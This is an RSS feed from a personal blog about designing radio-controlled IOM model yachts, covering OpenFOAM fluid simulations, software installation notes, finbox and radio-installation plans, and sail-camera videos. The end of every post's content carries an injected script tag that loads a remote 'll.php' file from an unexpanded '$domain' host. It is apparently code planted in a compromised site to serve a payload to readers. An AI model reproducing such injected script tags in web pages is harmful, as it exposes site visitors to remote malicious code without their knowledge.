<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>anderswallin.net &#187; IOM Design</title>
	<atom:link href="http://www.anderswallin.net/category/iom-design/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.anderswallin.net</link>
	<description></description>
	<lastBuildDate>Wed, 08 Feb 2012 12:05:52 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>CFD with OpenFOAM</title>
		<link>http://www.anderswallin.net/2009/09/cfd-with-openfoam/</link>
		<comments>http://www.anderswallin.net/2009/09/cfd-with-openfoam/#comments</comments>
		<pubDate>Sat, 26 Sep 2009 11:13:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[IOM Design]]></category>
		<category><![CDATA[cfd]]></category>
		<category><![CDATA[IOM]]></category>
		<category><![CDATA[openFOAM]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/?p=1802</guid>
		<description><![CDATA[Some details and text on the Computational Fluid Dynamics simulations that mostly Jari has been doing lately. They are done with the open-source software package OpenFOAM, which is of course free to download and use. We run it under Ubuntu, and use fairly affordable 4-core machines with 8 Gb of RAM. You start with a [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.anderswallin.net/wp-content/uploads/2009/09/iom_cfd.png"><img class="alignnone size-medium wp-image-1803" title="iom_cfd" src="http://www.anderswallin.net/wp-content/uploads/2009/09/iom_cfd-450x284.png" alt="iom_cfd" width="450" height="284" /></a></p>
<p>Some details and text on the <a href="http://en.wikipedia.org/wiki/Computational_fluid_dynamics">Computational Fluid Dynamics</a> simulations that mostly Jari has been doing lately. They are done with the open-source software package <a href="http://www.opencfd.co.uk/openfoam/">OpenFOAM</a>, which is of course free to download and use. We run it under Ubuntu, and use fairly affordable 4-core machines with 8 Gb of RAM.</p>
<p>You start with a CAD model of the geometry you want to simulate. Here the hull-shape has been taken from one program, and the sail shape from another sail-design program. They're imported into a third CAD program and joined into the model we want to simulate.</p>
<p>There are (at least!) two issues at this stage: (1) the meshing-tools that follow do not like infinitely thin surfaces, so in order for meshing to run smoothly the sails have to be drawn as having some finite thickness, about 1-2 mm in this case. We can try to reduce this in the future. (2) This is only a CFD simulation, not a fluid-structure interaction simulation. That means the geometry (sails, mast, etc) is not going to move or flex in any way in response to the fluid pressure. So the trim and shape you draw into the sails is going to stay there...</p>
<p>The geometry is exported as STL-files for each surface. Meshing then follows. It's first done with a simple program called blockMesh, and then refined close to any specified surfaces using a program called snappyHexMesh. The resulting mesh looks like this:</p>
<p><a href="http://www.anderswallin.net/wp-content/uploads/2009/09/mesh3.png"><img class="alignnone size-medium wp-image-1804" title="mesh3" src="http://www.anderswallin.net/wp-content/uploads/2009/09/mesh3-450x281.png" alt="mesh3" width="450" height="281" /></a></p>
<p>And if we zoom in we see the smaller cell-size around the surfaces of the model:</p>
<p><a href="http://www.anderswallin.net/wp-content/uploads/2009/09/Mesh1.png"><img class="alignnone size-medium wp-image-1805" title="Mesh1" src="http://www.anderswallin.net/wp-content/uploads/2009/09/Mesh1-450x283.png" alt="Mesh1" width="450" height="283" /></a></p>
<p>Here's another potential problem with CFD. (3) How do you know what the right mesh-size is? You don't. Decreasing the cell-size obviously leads to a more accurate simulation, but as the size of the mesh goes up the calculation time increases similarly. Some CFD/FEM-packages have adaptive solvers that can increase the mesh-resolution in areas of the simulation where it's most appropriate. I don't know if OpenFOAM has that. One simple approach is to run the same simulation with successively increasing mesh-sizes and see how the end result (e.g. drive force on the model) reaches a plateau, hopefully the correct value.</p>
<p>Then it's time to specify boundary conditions. For a wind-tunnel type of simulation the in-flow velocity on the upwind wall of our simulation-domain is fixed, and the surfaces of the model are specified as no-slip surfaces.</p>
<p>Solving follows. Now you actually have to select the physics model you want to simulate. Well that's easy, in the continuum-limit fluids should behave according to the <a href="http://en.wikipedia.org/wiki/Navier%E2%80%93Stokes_equations">Navier-Stokes equations</a>. The only problem is that these are nonlinear and difficult to solve. Some people actually do this, but it takes a big big mesh and lot's of computing power. It's called <a href="http://en.wikipedia.org/wiki/Direct_numerical_simulation">direct numerical simulation</a>. The rest of us with desktop-computers need to solve something simpler than the N-S equations. A lot of different approximations exist, so (4) how do you know which physics model to choose? The <a href="http://en.wikipedia.org/wiki/Reynolds-averaged_Navier%E2%80%93Stokes_equations">Reynolds-averaged N-S equations</a> (RANS) are a popular choice. Our simulations use the simpleFoam solver, which assumes an incompressible fluid, and includes a k-epsilon turbulence model.</p>
<p>OpenFOAM can run the solver on one CPU-core, or the mesh can be split into parts and each part of the mesh run on a separate CPU-core. These simulations usually take around 6-12 hours to complete on a single 2.5 GHz core.</p>
<p>After solving it's time to visualize the results:</p>
<p><a href="http://www.anderswallin.net/wp-content/uploads/2009/09/FlowAtZ0.75m.png"><img class="alignnone size-medium wp-image-1806" title="FlowAtZ0.75m" src="http://www.anderswallin.net/wp-content/uploads/2009/09/FlowAtZ0.75m-449x285.png" alt="FlowAtZ0.75m" width="449" height="285" /></a></p>
<p>OpenFOAM can also integrate the pressure over select parts of the model to obtain the total force on the model. Here we chose a wind-speed and direction for which <a href="http://www.onemetre.net/Design/Windtunl/Windtunl.htm">Lester Gilbert already has some real-world data</a>. The driving and heel-forces seem to roughly agree.</p>
<p>Animations enhance the visual experience:</p>
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="450" height="295" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/OgF5sgfkkuA&amp;hl=en&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="450" height="295" src="http://www.youtube.com/v/OgF5sgfkkuA&amp;hl=en&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>Add some music and a few camera-angles, and you would think this qualifies as promotional material for any upcoming Americas Cup syndicate...</p>
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="320" height="265" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/c33qpPHd73E&amp;hl=en&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="320" height="265" src="http://www.youtube.com/v/c33qpPHd73E&amp;hl=en&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>(To see this in bigger format, click the "YouTube" logo to go their page, and then click "HQ")</p>
<p>That's all for now. If you're a CFD-expert, please be brave and comment below on my open questions (1)-(4) !<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2009/09/cfd-with-openfoam/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Downwind IOM CFD</title>
		<link>http://www.anderswallin.net/2009/09/downwind-iom-cfd/</link>
		<comments>http://www.anderswallin.net/2009/09/downwind-iom-cfd/#comments</comments>
		<pubDate>Fri, 25 Sep 2009 09:43:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[IOM Design]]></category>
		<category><![CDATA[cfd]]></category>
		<category><![CDATA[openFOAM]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/?p=1796</guid>
		<description><![CDATA[Update: video removed and replaced with this one containing more awesomeness: http://www.youtube.com/watch?v=c33qpPHd73E An IOM boat+rig in the digital wind-tunnel sailing downwind. The plan is to run a few of these and compare with actual data. Available in HQ on youtube, remember to turn the sound up!]]></description>
			<content:encoded><![CDATA[<p>Update: video removed and replaced with this one containing more awesomeness: <a href="http://www.youtube.com/watch?v=c33qpPHd73E">http://www.youtube.com/watch?v=c33qpPHd73E</a></p>
<p>An IOM boat+rig in the digital wind-tunnel sailing downwind. The plan is to run a few of these and compare with <a href="http://www.onemetre.net/Design/Windtunl/Windtunl.htm">actual data</a>. Available in HQ on youtube, remember to turn the sound up!<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2009/09/downwind-iom-cfd/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Colorful Fluid Dynamics</title>
		<link>http://www.anderswallin.net/2009/09/colorful-fluid-dynamics/</link>
		<comments>http://www.anderswallin.net/2009/09/colorful-fluid-dynamics/#comments</comments>
		<pubDate>Mon, 21 Sep 2009 10:11:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[IOM Design]]></category>
		<category><![CDATA[cfd]]></category>
		<category><![CDATA[openFOAM]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/?p=1713</guid>
		<description><![CDATA[Jari has put quite a bit of time and effort into learning to use the OpenFOAM open-source CFD package. It's maybe not as polished and pretty as Comsol or Ansys or any of the other 10+ keur costing commercial packages, but it seems OpenFOAM has all the same solvers and physics models and is able [...]]]></description>
			<content:encoded><![CDATA[<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/FBWr2Pz1AI4&amp;hl=en&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/FBWr2Pz1AI4&amp;hl=en&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>Jari has put quite a bit of time and effort into learning to use the <a href="http://www.opencfd.co.uk/openfoam/">OpenFOAM</a> open-source <a href="http://en.wikipedia.org/wiki/CFD">CFD</a> package. It's maybe not as polished and pretty as Comsol or Ansys or any of the other 10+ keur costing commercial packages, but it seems OpenFOAM has all the same solvers and physics models and is able to handle complex geometries and meshing - if you spend the time and effort to learn how it all works.</p>
<p>Stay tuned for some "digital wind-tunnel" testing of IOM sails and foils... (bring your 4/8-core machine and 8+ Gb of RAM)<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2009/09/colorful-fluid-dynamics/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>OpenFOAM 1.5 on Ubuntu 8.10</title>
		<link>http://www.anderswallin.net/2009/04/openfoam-15-on-ubuntu-810/</link>
		<comments>http://www.anderswallin.net/2009/04/openfoam-15-on-ubuntu-810/#comments</comments>
		<pubDate>Sat, 11 Apr 2009 10:25:05 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[IOM Design]]></category>
		<category><![CDATA[cfd]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/?p=1254</guid>
		<description><![CDATA[Although we have a general idea of how low Reynolds number foils, bulbs, and rudders should look like, we thought it would be fun to do some Colorful Fluid Dynamics to test different airfoils and configurations. It's likely that we will pick a well-known airfoil for the first set of foils and bulb for the [...]]]></description>
			<content:encoded><![CDATA[<p>Although we have a general idea of how low Reynolds number foils, bulbs, and rudders should look like, we thought it would be fun to do some <a href="http://en.wikipedia.org/wiki/Computational_fluid_dynamics">Colorful Fluid Dynamics</a> to test different airfoils and configurations. It's likely that we will pick a well-known airfoil for the first set of foils and bulb for the Pikanto project, but if anything comes out of this computational analysis then cnc-machining new moulds is not a problem.</p>
<p>There are a lot of CFD software packages out there, some expensive and some hugely expensive. The most well known open-source alternative seems to be OpenFOAM. It's not as easy to use as the fancy commercial ones, but it's well supported by both academic and industrial users, and it's free! Some installation notes, mostly for myself, on how I installed <a href="http://www.ubuntu.com/">Ubuntu 8.10</a> and <a href="http://www.opencfd.co.uk/openfoam/">OpenFOAM 1.5</a>.</p>
<ol>
<li>download 64-bit Ubuntu 8.10 iso-file and burn to CD (8.04 did not want to boot on my Q9300 cpu machine, probably a motherboard conflict?)</li>
<li>install Ubuntu as normal, run suggested updates (286 of them actually!)</li>
<li>for OpenFOAM I roughly followed instructions from here: <a href="https://help.ubuntu.com/community/OpenFOAM">https://help.ubuntu.com/community/OpenFOAM</a></li>
<li>download all the <strong>.gtgz</strong> files from <a href="http://www.opencfd.co.uk/openfoam/linux64.html">here</a>. Rename them to just <strong>.tgz</strong> so Ubuntu knows how to extract them</li>
<li>run the bashrc magic with '<strong>. $HOME/OpenFOAM/OpenFOAM-1.5/etc/bashrc</strong>' followed by '<strong>source ~/.bashrc</strong>'</li>
<li>now in OpenFOAM-1.5/bin we can try '<strong>./foamInstallationTest</strong>' which errors out because it doesn't find ssh or rsh (these are only needed for remote installations or cluster-calculations or similar I think)</li>
<li>to make <strong>foamInstallationTest </strong>happy, install ssh: <strong>sudo apt-get install ssh</strong></li>
<li>now<strong> </strong><strong>foamInstallationTest </strong>reports that all systems are go.</li>
<li>paraFoam which is used for pre- and post-processing needs QT. I'm not sure which packages exactly are required, but mine started working after installing '<strong>libqtcore4</strong>', '<strong>libqt4-assistant</strong>', '<strong>libqtgui4</strong>' and all of their dependencies<strong>. </strong>(I did this with the synaptic package manager)</li>
<li><strong>Ready!</strong></li>
</ol>
<p>Try running the tutorial cases in e.g. ~/OpenFOAM/OpenFOAM-1.5/tutorials/icoFoam/cavity. This tutorial is explained in the <a href="http://www.opencfd.co.uk/openfoam/doc/cavity.html#x5-40002.1">docs here</a>. Everything is set up already, so you only have to run <strong>blockMesh</strong> to generate the mesh, then <strong>icoFoam</strong> to do the actual calculation, and then visualize with <strong>paraFoam</strong>.</p>
<p><a href="http://www.anderswallin.net/wp-content/uploads/2009/04/arrows.png"><img class="alignnone size-medium wp-image-1255" title="arrows" src="http://www.anderswallin.net/wp-content/uploads/2009/04/arrows-450x444.png" alt="arrows" width="450" height="444" /></a><script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2009/04/openfoam-15-on-ubuntu-810/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Styyra 2008</title>
		<link>http://www.anderswallin.net/2008/12/styyra-2008/</link>
		<comments>http://www.anderswallin.net/2008/12/styyra-2008/#comments</comments>
		<pubDate>Mon, 22 Dec 2008 16:08:28 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[IOM Design]]></category>
		<category><![CDATA[styyra]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/?p=966</guid>
		<description><![CDATA[The annual newsletter of the Finnish radio-sailors is out today:]]></description>
			<content:encoded><![CDATA[<p>The annual newsletter of the <a href="http://www.iom-nordic.org/">Finnish radio-sailors</a> is out today:</p>
<p><a href="http://www.iom-nordic.org/images/stories/FIN/styyra/styyra2008.pdf"><img class="alignnone" src="http://www.iom-nordic.org/images/stories/FIN/styyra/styyra2008.jpg" alt="" width="200" height="228" /></a><script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2008/12/styyra-2008/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IOM sail camera videos</title>
		<link>http://www.anderswallin.net/2008/11/iom-sail-camera-videos/</link>
		<comments>http://www.anderswallin.net/2008/11/iom-sail-camera-videos/#comments</comments>
		<pubDate>Wed, 05 Nov 2008 08:10:13 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[IOM Design]]></category>
		<category><![CDATA[IOM]]></category>
		<category><![CDATA[sail-camera]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/?p=881</guid>
		<description><![CDATA[Looks like the mast bends to leeward at the middle, while the top of the mast stays in place. I don't think that's a good thing. Should try lower shroud attachment point and maybe shorter spreaders. Remember to turn up the sound so you hear the wind, water, and the RMG winch! Also try these [...]]]></description>
			<content:encoded><![CDATA[<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="350" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://www.youtube.com/v/_kKyJSl0M_g" /><embed type="application/x-shockwave-flash" width="425" height="350" src="http://www.youtube.com/v/_kKyJSl0M_g"></embed></object></p>
<p>Looks like the mast bends to leeward at the middle, while the top of the mast stays in place. I don't think that's a good thing. Should try lower shroud attachment point and maybe shorter spreaders.</p>
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="350" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://www.youtube.com/v/J25RkSn1VqU" /><embed type="application/x-shockwave-flash" width="425" height="350" src="http://www.youtube.com/v/J25RkSn1VqU"></embed></object></p>
<p>Remember to turn up the sound so you hear the wind, water, and the RMG winch! Also try these in higher quality by going to youtube and clicking "watch in high quality".</p>
<p>Here's how the camera looks on the foredeck:</p>
<p><a href="http://www.anderswallin.net/wp-content/uploads/2008/11/img_5518.jpg"><img class="alignnone size-medium wp-image-882" title="img_5518" src="http://www.anderswallin.net/wp-content/uploads/2008/11/img_5518-450x300.jpg" alt="" width="450" height="300" /></a><script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2008/11/iom-sail-camera-videos/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Prototype finbox for Noux</title>
		<link>http://www.anderswallin.net/2006/11/prototype-finbox-for-noux/</link>
		<comments>http://www.anderswallin.net/2006/11/prototype-finbox-for-noux/#comments</comments>
		<pubDate>Tue, 14 Nov 2006 20:16:17 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[IOM Design]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/2006/11/prototype-finbox-for-noux/</guid>
		<description><![CDATA[Although we've already built a number of finboxes, I've forgotten to publish the plan - so here it is. As the Noux Mk2 is still somewhat of a prototype this finbox has a long 27.5 x 5 mm slot for the mast which will allow optimisation of the best mast position and rake angle during [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.anderswallin.net/wp-content/2006_11finbox/keelbox.pdf"><img src="http://www.anderswallin.net/wp-content/2006_11finbox/keelbox.jpg" /></a></p>
<p>Although we've already built a number of finboxes, I've forgotten to publish the plan - so here it is. As the Noux Mk2 is still somewhat of a prototype this finbox has a long 27.5 x 5 mm slot for the mast which will allow optimisation of the best mast position and rake angle during testing. So as not to carry a whole lot of extra water in the boat we made the mast-box narrow, 5mm, which means that the lower end of the mast needs to be an aluminium extrusion of 5mm width... A future Noux Mk3 might again have a more traditional mastbox for a round mast when we have found the optimal position.<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2006/11/prototype-finbox-for-noux/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Noux Reduced Shadows</title>
		<link>http://www.anderswallin.net/2006/10/noux-reduced-shadows/</link>
		<comments>http://www.anderswallin.net/2006/10/noux-reduced-shadows/#comments</comments>
		<pubDate>Wed, 04 Oct 2006 18:24:32 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[IOM Design]]></category>
		<category><![CDATA[noux]]></category>
		<category><![CDATA[plan]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/2006/10/noux-reduced-shadows/</guid>
		<description><![CDATA[I've had a couple of requests for reduced shadows for the Noux by people wanting to home-build the boat using planking or other methods. Here are the lines with 1-6mm offset from the outer hull surface. A DXF file is attached to the pdf, click the small paper-clip next to the text to save the [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.anderswallin.net/wp-content/2006_10offset/offsets.pdf"><img src="http://www.anderswallin.net/wp-content/2006_10offset/offsets.png" alt="" /></a></p>
<p>I've had a couple of requests for reduced shadows for the Noux by people wanting to home-build the boat using planking or other methods. Here are the lines with 1-6mm offset from the outer hull surface. A DXF file is attached to the pdf, click the small paper-clip next to the text to save the DXF as a separate file<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2006/10/noux-reduced-shadows/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>RC-Pot recess for Noux</title>
		<link>http://www.anderswallin.net/2006/09/rc-pot-recess-for-noux/</link>
		<comments>http://www.anderswallin.net/2006/09/rc-pot-recess-for-noux/#comments</comments>
		<pubDate>Fri, 29 Sep 2006 18:04:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[IOM Building]]></category>
		<category><![CDATA[IOM Design]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/2006/09/rc-pot-recess-for-noux/</guid>
		<description><![CDATA[I'm really happy that we now have the whole chain from drawing (far left), into CAD/CAM andÂ cnc millingÂ (middle left) making high-tolerance (well, almost...) parts (middle right), which can be used as moulds for Noux components (far right). With some effort and determination you can now go from concept drawing to finished part in one weekend. [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.anderswallin.net/wp-content/2006_09recess/recsmall.png" /><img src="http://www.anderswallin.net/wp-content/2006_09recess/millsmall.jpg" /><img src="http://www.anderswallin.net/wp-content/2006_09recess/mouldsmall.jpg" /><img src="http://www.anderswallin.net/wp-content/2006_09recess/opensmall.jpg" /><br />
I'm really happy that we now have the whole chain from drawing (far left), into CAD/CAM andÂ cnc millingÂ (middle left) making high-tolerance (well, almost...) parts (middle right), which can be used as moulds for Noux components (far right). With some effort and determination you can now go from concept drawing to finished part in one weekend.</p>
<p><span id="more-88"></span></p>
<p><img src="http://www.anderswallin.net/wp-content/2006_09recess/rec.png" /><br />
Here's the part I wanted to make. It's an RC-pot recess for the Noux. I'm using a lid and rim from a food container as the only hatch in the boat. The rim attaches to the lower conical part, and the lid is recessed into the deck by the upper conical part.</p>
<p><img src="http://www.anderswallin.net/wp-content/2006_09recess/mill.jpg" /><br />
Our mill is still very much <a href="http://www.anderswallin.net/2006/02/new-servos-and-rails-for-cnc-upgrade/">being upgraded</a> with parts here and there, here you can note the new heavy duty vise (below the part), and a new coolant system (blue lines, now powered by a much stronger and higher volume pump than before). We're now using <a href="http://www.linuxcnc.org/">EMC2</a> to drive the mill which works much better than <a href="http://www.dakeng.com/turbo.html">turbocnc</a>.</p>
<p><img src="http://www.anderswallin.net/wp-content/2006_09recess/mould.jpg" /><br />
Here is the finished part. It's milled in two parts with a central bolt holding the two pieces together. Here I've positioned the disks on the <a href="http://www.anderswallin.net/2006/09/2006-turku-iom-ranking/">aft-deck mould</a>, approximately where they will be attached eventually.</p>
<p><img src="http://www.anderswallin.net/wp-content/2006_09recess/parts.jpg" /><br />
Before bolting the disks to the aft-deck mould we wanted to make a test part, so in the upper left of this picture you see a moudling with only the two rings. We've used epoxy mixed withÂ micro-fibers (the brown/pink stuff)Â to round off the 90 degree corner before applying any fiberglass. To the right the rim and lid of the pot.</p>
<p>Removing the moulding from the metal disks was no easy task although we used the same Frekote release agent that works well with other parts. The aft-deck with the pot-recess will probably require some careful moulding technique or otherwise we will end up with a deck stuck to the mould...</p>
<p><img src="http://www.anderswallin.net/wp-content/2006_09recess/open.jpg" /><img src="http://www.anderswallin.net/wp-content/2006_09recess/closed.jpg" /><br />
Happily, the rim fits nicely inside the ring as it should after pressing it down quite hard. A tight fit is good since this join needs to be watertight - probably silicone sealant + four screws are going to hold down the rim in the actual boat. On the right I've put on the lid and it recesses nicely and will leaveÂ just 1-2mm of the lid above deck level. There's an opening for the bit that sticks out of the lid - I think I'm going to cut that off the lids and have a perfectly round hatch in the boat.</p>
<p><img src="http://www.anderswallin.net/wp-content/2006_09recess/rc.png" /><br />
I've thought some more about the placement of the radio components and come to the conclusion that <a href="http://www.anderswallin.net/2006/08/radio-installation-plans/">the 'flatpack' thing I was thinking about previously</a>Â is maybe not so good. It would position the battery inbetween the winch and the servo and that would make moulding a strong structure quite hard. Above is my latest idea, which would position the winch and the servo on a moudling which will attach to the inside rim of the hatch. This part will also require a custom mould which I'll probably cnc cut from aluminium. The battery would then require a separate 'pocket' or 'cage' that must be made separately. The <a href="http://www.spektrumrc.com/Products/Default.aspx?ProdID=SPM6000">Spektrum DX6 Rx</a> is so small and light that it really does not need any special space considerations, it can be velcroed to almost any surface.<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2006/09/rc-pot-recess-for-noux/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Radio installation plans</title>
		<link>http://www.anderswallin.net/2006/08/radio-installation-plans/</link>
		<comments>http://www.anderswallin.net/2006/08/radio-installation-plans/#comments</comments>
		<pubDate>Sun, 27 Aug 2006 13:48:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[IOM Design]]></category>

		<guid isPermaLink="false">http://www.anderswallin.net/2006/08/radio-installation-plans/</guid>
		<description><![CDATA[Some plans and ideas for the Noux mk2 radio installation. We are using a ca 116mm diameter food container lid and rim as the only deck hatch. We want the winch, batteries, servo, and Rx, all accessible through this hatch. Update 2006 Aug 30: A variation on the same theme: a "flat-pack" version. Here is [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.anderswallin.net/wp-content/2006_08noux2pot/perspective.png" align="right" />Some plans and ideas for the Noux mk2 radio installation. We are using a ca 116mm diameter food container lid and rim as the only deck hatch. We want the winch, batteries, servo, and Rx, all accessible through this hatch.</p>
<p>Update 2006 Aug 30: A variation on the same theme: a "flat-pack" version.</p>
<p><span id="more-84"></span></p>
<p><img src="http://www.anderswallin.net/wp-content/2006_08noux2pot/side.png" /><a href="http://www.anderswallin.net/wp-content/2006_08noux2pot/side.pdf"><img src="http://www.anderswallin.net/wp-content/2006_08noux2pot/side_p.png" /></a><br />
Here is a side view of what we came up with. The winch, either an RMG or a Graupner Regatta, is located most forward, the battery in a recess in the middle, and the rudder servo is aft. The Rx is small and light so it can be velcroed almost anywhere. (click image on the right for a pdf)</p>
<p><img src="http://www.anderswallin.net/wp-content/2006_08noux2pot/top.png" /><a href="http://www.anderswallin.net/wp-content/2006_08noux2pot/top.pdf"><img src="http://www.anderswallin.net/wp-content/2006_08noux2pot/top_p.png" /></a><br />
A top view. Almost half of the available lengthwise space needs to be allocated to the winch (at least if using an RMG. The Regatta is a bit smaller, but on the other hand it uses a larger drum). Click image on the right for a pdf.</p>
<p><img src="http://www.anderswallin.net/wp-content/2006_08noux2pot/mould.png" /><br />
This is the moulding that would hold the winch, batteries, and servo. Need to come up with a smart way of moulding this piece... anyone have any ideas ?</p>
<p><img src="http://www.anderswallin.net/wp-content/2006_08noux2pot/perspective2.png" /><br />
Another perspective view of how the radio installation could look like. Compare this to Craig Smith's Obsession below.<br />
<img src="http://www.anderswallin.net/wp-content/2006_08noux2/obsession.jpg" /></p>
<p>I remember seeing a nice compact radio installation on the Roar Edge marbleheads, it was called an 'rc-boot' or something similar. If anyone knows ifÂ the current Stollery marblehead radio installation is similar, send me a picture !</p>
<h2>A 'flat-pack' version</h2>
<p>Placing the winch, battery, and servo all inside the 115 mm circular hatch could make things a bit cramped inside the boat. So here is a version with the battery cells all lined up in one row, I'm calling it a flat-pack.<br />
This saves the width of an AA cell, about 15 mm, from the length of the radio moulding. and that allows me toÂ enlarge the winch side of the moulding by about 5 mm and the servo side by almost 10 mm. Now both the winch and servo seem to fit much better.<br />
The downside ofcourse is that the new boat will need new battery packs. Well, it's a good idea to change batteries every two years or so anyway, so I'm not considering this as a major drawback of this design (It will be nice to upgrade to the new 2700 mAh AA cells anyway, added security and no need to change batteries during a whole day of 3-rig racing).</p>
<p><img src="http://www.anderswallin.net/wp-content/2006_08noux2pot/flatpack.png" /><a href="http://www.anderswallin.net/wp-content/2006_08noux2pot/flatpack.pdf"><img src="http://www.anderswallin.net/wp-content/2006_08noux2pot/flatpack_d.png" /></a><br />
click the picture on the right to download a pdf drawing.<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.anderswallin.net/2006/08/radio-installation-plans/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>

